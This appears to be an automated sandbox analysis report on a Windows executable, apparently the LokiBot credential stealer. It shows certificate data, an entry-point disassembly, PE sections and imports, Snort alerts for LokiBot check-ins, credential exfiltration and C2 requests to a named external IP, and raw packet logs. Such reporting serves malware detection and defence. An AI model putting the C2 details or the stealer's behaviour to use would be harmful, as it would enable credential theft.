                  Signature Issuer:E=Suffraganal234@Pythonomorphous.Fi, O=Sammenfjningsstedet, OU="Aftapning Yasmak ", CN=Sammenfjningsstedet, L=El Paso, S=Texas, C=US
                  Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                  Error Number:-2146762487
                  Not Before, Not After
                  • 22/10/2023 10:09:22 21/10/2026 10:09:22
                  Subject Chain
                  • E=Suffraganal234@Pythonomorphous.Fi, O=Sammenfjningsstedet, OU="Aftapning Yasmak ", CN=Sammenfjningsstedet, L=El Paso, S=Texas, C=US
                  Version:3
                  Thumbprint MD5:9634348B85DE09397E62224E34DCE22E
                  Thumbprint SHA-1:1A0B8128C59EF62B490A6DAE8BE0A2C986F32AE9
                  Thumbprint SHA-256:6B29B79CC812F73020CBC0A6B5D85CD9289D75AE2C5C0ADE79D590D21CA98C19
                  Serial:714766568729AA99CD416ED9146D00D02A4509ED

                  Entrypoint Preview

                  Instruction
                  sub esp, 000002D4h
                  push ebx
                  push esi
                  push edi
                  push 00000020h
                  pop edi
                  xor ebx, ebx
                  push 00008001h
                  mov dword ptr [esp+14h], ebx
                  mov dword ptr [esp+10h], 0040A2E0h
                  mov dword ptr [esp+1Ch], ebx
                  call dword ptr [004080B0h]
                  call dword ptr [004080ACh]
                  cmp ax, 00000006h
                  je 00007FF051796FA3h
                  push ebx
                  call 00007FF05179A0E4h
                  cmp eax, ebx
                  je 00007FF051796F99h
                  push 00000C00h
                  call eax
                  mov esi, 004082B8h
                  push esi
                  call 00007FF05179A05Eh
                  push esi
                  call dword ptr [0040815Ch]
                  lea esi, dword ptr [esi+eax+01h]
                  cmp byte ptr [esi], 00000000h
                  jne 00007FF051796F7Ch
                  push ebp
                  push 00000009h
                  call 00007FF05179A0B6h
                  push 00000007h
                  call 00007FF05179A0AFh
                  mov dword ptr [007A8A24h], eax
                  call dword ptr [0040803Ch]
                  push ebx
                  call dword ptr [004082A4h]
                  mov dword ptr [007A8AD8h], eax
                  push ebx
                  lea eax, dword ptr [esp+34h]
                  push 000002B4h
                  push eax
                  push ebx
                  push 0079FEE0h
                  call dword ptr [00408188h]
                  push 0040A2C8h
                  push 007A7A20h
                  call 00007FF051799C98h
                  call dword ptr [004080A8h]
                  mov ebp, 007B3000h
                  push eax
                  push ebp
                  call 00007FF051799C86h
                  push ebx
                  call dword ptr [00408174h]
                  add word ptr [eax], 0000h

                  Rich Headers

                  Programming Language:
                  • [EXP] VC++ 6.0 SP5 build 8804

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x3dd0000x5bad8.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0xe2e680x1898.data
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b4.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x61e80x62007105c7c7ca5a4b5bbc8bc8925d3c2002False0.6776945153061225data6.507727907374682IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata0x80000x13a40x14002fd23f25ba6d052f3a4f032544496f73False0.453125data5.162313935974215IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0xa0000x39eb180x60096b0322a377adf87f6664c8d50305d4dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .ndata0x3a90000x340000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0x3dd0000x5bad80x5bc007d52bbf04bb54a3040d1850c6db645ffFalse0.07021936733651227data4.39755174962238IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_ICON0x3dd3280x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.044334556321567006
                  RT_ICON0x41f3500x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.08383118419496037
                  RT_ICON0x42fb780x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.14478034955125177
                  RT_ICON0x433da00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.22520746887966805
                  RT_ICON0x4363480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.2607879924953096
                  RT_ICON0x4373f00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.3782786885245902
                  RT_ICON0x437d780x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.4698581560283688
                  RT_DIALOG0x4381e00x100dataEnglishUnited States0.5234375
                  RT_DIALOG0x4382e00x11cdataEnglishUnited States0.6056338028169014
                  RT_DIALOG0x4384000xc4dataEnglishUnited States0.5918367346938775
                  RT_DIALOG0x4384c80x60dataEnglishUnited States0.7291666666666666
                  RT_GROUP_ICON0x4385280x68dataEnglishUnited States0.7403846153846154
                  RT_VERSION0x4385900x204dataEnglishUnited States0.5445736434108527
                  RT_MANIFEST0x4387980x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                  Imports

                  DLLImport
                  KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                  USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
                  GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                  SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                  ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                  COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                  ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States

                  Network Behavior

                  Snort IDS Alerts

                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  07/03/24-09:42:59.735537TCP2025381ET TROJAN LokiBot Checkin4972580192.168.2.745.61.136.239
                  07/03/24-09:42:37.481024TCP2025381ET TROJAN LokiBot Checkin4971980192.168.2.745.61.136.239
                  07/03/24-09:41:37.959573TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14970880192.168.2.745.61.136.239
                  07/03/24-09:42:34.194434TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971880192.168.2.745.61.136.239
                  07/03/24-09:42:21.173938TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971580192.168.2.745.61.136.239
                  07/03/24-09:42:34.194434TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971880192.168.2.745.61.136.239
                  07/03/24-09:42:21.173938TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971580192.168.2.745.61.136.239
                  07/03/24-09:42:34.194434TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971880192.168.2.745.61.136.239
                  07/03/24-09:42:56.548579TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972480192.168.2.745.61.136.239
                  07/03/24-09:42:56.548579TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972480192.168.2.745.61.136.239
                  07/03/24-09:42:56.548579TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972480192.168.2.745.61.136.239
                  07/03/24-09:41:44.014349TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24970980192.168.2.745.61.136.239
                  07/03/24-09:42:44.173590TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972180192.168.2.745.61.136.239
                  07/03/24-09:42:44.173590TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972180192.168.2.745.61.136.239
                  07/03/24-09:42:44.173590TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972180192.168.2.745.61.136.239
                  07/03/24-09:42:21.173938TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971580192.168.2.745.61.136.239
                  07/03/24-09:42:34.194434TCP2025381ET TROJAN LokiBot Checkin4971880192.168.2.745.61.136.239
                  07/03/24-09:42:52.492042TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972380192.168.2.745.61.136.239
                  07/03/24-09:41:44.014349TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14970980192.168.2.745.61.136.239
                  07/03/24-09:41:44.014349TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970980192.168.2.745.61.136.239
                  07/03/24-09:42:56.548579TCP2025381ET TROJAN LokiBot Checkin4972480192.168.2.745.61.136.239
                  07/03/24-09:42:30.345716TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971780192.168.2.745.61.136.239
                  07/03/24-09:42:30.345716TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971780192.168.2.745.61.136.239
                  07/03/24-09:42:30.345716TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971780192.168.2.745.61.136.239
                  07/03/24-09:42:52.492042TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972380192.168.2.745.61.136.239
                  07/03/24-09:42:52.492042TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972380192.168.2.745.61.136.239
                  07/03/24-09:41:53.897705TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971180192.168.2.745.61.136.239
                  07/03/24-09:42:48.641218TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972280192.168.2.745.61.136.239
                  07/03/24-09:41:53.897705TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971180192.168.2.745.61.136.239
                  07/03/24-09:41:53.897705TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971180192.168.2.745.61.136.239
                  07/03/24-09:41:58.579061TCP2025381ET TROJAN LokiBot Checkin4971380192.168.2.745.61.136.239
                  07/03/24-09:41:48.805296TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971080192.168.2.745.61.136.239
                  07/03/24-09:41:58.579061TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971380192.168.2.745.61.136.239
                  07/03/24-09:42:37.481024TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971980192.168.2.745.61.136.239
                  07/03/24-09:42:26.580102TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971680192.168.2.745.61.136.239
                  07/03/24-09:42:26.580102TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971680192.168.2.745.61.136.239
                  07/03/24-09:41:37.959573TCP2025381ET TROJAN LokiBot Checkin4970880192.168.2.745.61.136.239
                  07/03/24-09:41:48.805296TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971080192.168.2.745.61.136.239
                  07/03/24-09:41:58.579061TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971380192.168.2.745.61.136.239
                  07/03/24-09:42:26.580102TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971680192.168.2.745.61.136.239
                  07/03/24-09:42:48.641218TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972280192.168.2.745.61.136.239
                  07/03/24-09:42:48.641218TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972280192.168.2.745.61.136.239
                  07/03/24-09:41:48.805296TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971080192.168.2.745.61.136.239
                  07/03/24-09:41:53.897705TCP2025381ET TROJAN LokiBot Checkin4971180192.168.2.745.61.136.239
                  07/03/24-09:41:58.579061TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971380192.168.2.745.61.136.239
                  07/03/24-09:42:40.474010TCP2025381ET TROJAN LokiBot Checkin4972080192.168.2.745.61.136.239
                  07/03/24-09:42:04.906638TCP2025381ET TROJAN LokiBot Checkin4971480192.168.2.745.61.136.239
                  07/03/24-09:42:52.492042TCP2025381ET TROJAN LokiBot Checkin4972380192.168.2.745.61.136.239
                  07/03/24-09:42:30.345716TCP2025381ET TROJAN LokiBot Checkin4971780192.168.2.745.61.136.239
                  07/03/24-09:42:21.173938TCP2025381ET TROJAN LokiBot Checkin4971580192.168.2.745.61.136.239
                  07/03/24-09:42:40.474010TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972080192.168.2.745.61.136.239
                  07/03/24-09:42:40.474010TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972080192.168.2.745.61.136.239
                  07/03/24-09:42:40.474010TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972080192.168.2.745.61.136.239
                  07/03/24-09:42:04.906638TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971480192.168.2.745.61.136.239
                  07/03/24-09:42:04.906638TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971480192.168.2.745.61.136.239
                  07/03/24-09:42:44.173590TCP2025381ET TROJAN LokiBot Checkin4972180192.168.2.745.61.136.239
                  07/03/24-09:42:04.906638TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971480192.168.2.745.61.136.239
                  07/03/24-09:41:37.959573TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24970880192.168.2.745.61.136.239
                  07/03/24-09:41:44.014349TCP2025381ET TROJAN LokiBot Checkin4970980192.168.2.745.61.136.239
                  07/03/24-09:41:37.959573TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970880192.168.2.745.61.136.239
                  07/03/24-09:42:59.735537TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972580192.168.2.745.61.136.239
                  07/03/24-09:41:48.805296TCP2025381ET TROJAN LokiBot Checkin4971080192.168.2.745.61.136.239
                  07/03/24-09:42:59.735537TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972580192.168.2.745.61.136.239
                  07/03/24-09:42:26.580102TCP2025381ET TROJAN LokiBot Checkin4971680192.168.2.745.61.136.239
                  07/03/24-09:42:37.481024TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971980192.168.2.745.61.136.239
                  07/03/24-09:42:37.481024TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971980192.168.2.745.61.136.239
                  07/03/24-09:42:48.641218TCP2025381ET TROJAN LokiBot Checkin4972280192.168.2.745.61.136.239
                  07/03/24-09:42:59.735537TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972580192.168.2.745.61.136.239

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jul 3, 2024 09:41:34.078550100 CEST49706443192.168.2.7142.250.186.110
                  Jul 3, 2024 09:41:34.078583956 CEST44349706142.250.186.110192.168.2.7
                  Jul 3, 2024 09:41:34.078680038 CEST49706443192.168.2.7142.250.186.110
                  Jul 3, 2024 09:41:34.086325884 CEST49706443192.168.2.7142.250.186.110
                  Jul 3, 2024 09:41:34.086338997 CEST44349706142.250.186.110192.168.2.7
                  Jul 3, 2024 09:41:34.731492043 CEST44349706142.250.186.110192.168.2.7
                  Jul 3, 2024 09:41:34.731677055 CEST49706443192.168.2.7142.250.186.110
                  Jul 3, 2024 09:41:34.732213020 CEST44349706142.250.186.110192.168.2.7
                  Jul 3, 2024 09:41:34.732317924 CEST49706443192.168.2.7142.250.186.110
                  Jul 3, 2024 09:41:34.776537895 CEST49706443192.168.2.7142.250.186.110
                  Jul 3, 2024 09:41:34.776554108 CEST44349706142.250.186.110192.168.2.7
                  Jul 3, 2024 09:41:34.776753902 CEST44349706142.250.186.110192.168.2.7
                  Jul 3, 2024 09:41:34.776808023 CEST49706443192.168.2.7142.250.186.110
                  Jul 3, 2024 09:41:34.780627966 CEST49706443192.168.2.7142.250.186.110
                  Jul 3, 2024 09:41:34.824532032 CEST44349706142.250.186.110192.168.2.7
                  Jul 3, 2024 09:41:35.114289999 CEST44349706142.250.186.110192.168.2.7
                  Jul 3, 2024 09:41:35.114361048 CEST49706443192.168.2.7142.250.186.110
                  Jul 3, 2024 09:41:35.114516020 CEST49706443192.168.2.7142.250.186.110
                  Jul 3, 2024 09:41:35.114547014 CEST44349706142.250.186.110192.168.2.7
                  Jul 3, 2024 09:41:35.114614010 CEST49706443192.168.2.7142.250.186.110
                  Jul 3, 2024 09:41:35.151329041 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:35.151371956 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:35.151441097 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:35.151696920 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:35.151710987 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:35.786715031 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:35.786911964 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:35.790621996 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:35.790637016 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:35.790841103 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:35.790900946 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:35.791186094 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:35.836502075 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.793190002 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.793248892 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.793279886 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.793312073 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.793327093 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.793371916 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.793379068 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.793418884 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.798840046 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.798892021 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.798898935 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.798949003 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.815829992 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.815884113 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.815892935 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.815901995 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.815924883 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.815959930 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.818351030 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.818403959 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.818412066 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.818459034 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.824841976 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.824911118 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.824920893 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.824965000 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.830569029 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.830724001 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.830732107 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.830776930 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.836711884 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.836764097 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.836771011 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.836817980 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.842571974 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.842627048 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.842634916 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.842683077 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.848623037 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.848673105 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.848700047 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.848750114 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.854727030 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.854789019 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.854798079 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.854837894 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.860174894 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.860219955 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.860227108 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.860265017 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.865761995 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.865813017 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.865818977 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.865859032 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.871301889 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.871351004 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.871357918 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.871398926 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.876780987 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.876856089 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.883270025 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.883321047 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.883327961 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.883379936 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.902555943 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.902612925 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.902633905 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.902643919 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.902653933 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.902699947 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.902745962 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.902793884 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.902923107 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.902967930 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.904673100 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.904735088 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.904990911 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.905054092 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.910186052 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.910245895 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.910258055 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.910304070 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.910310984 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.910356045 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.915658951 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.915719032 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.915725946 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.915771961 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.920805931 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.920855999 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.920867920 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.920939922 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.925561905 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.925755978 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.925764084 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.925812006 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.930663109 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.930717945 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.930725098 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.930768013 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.934843063 CEST44349707142.250.185.193192.168.2.7
                  Jul 3, 2024 09:41:36.934895039 CEST49707443192.168.2.7142.250.185.193
                  Jul 3, 2024 09:41:36.934906006 CEST44349707142.250.185.193192.168.2.7
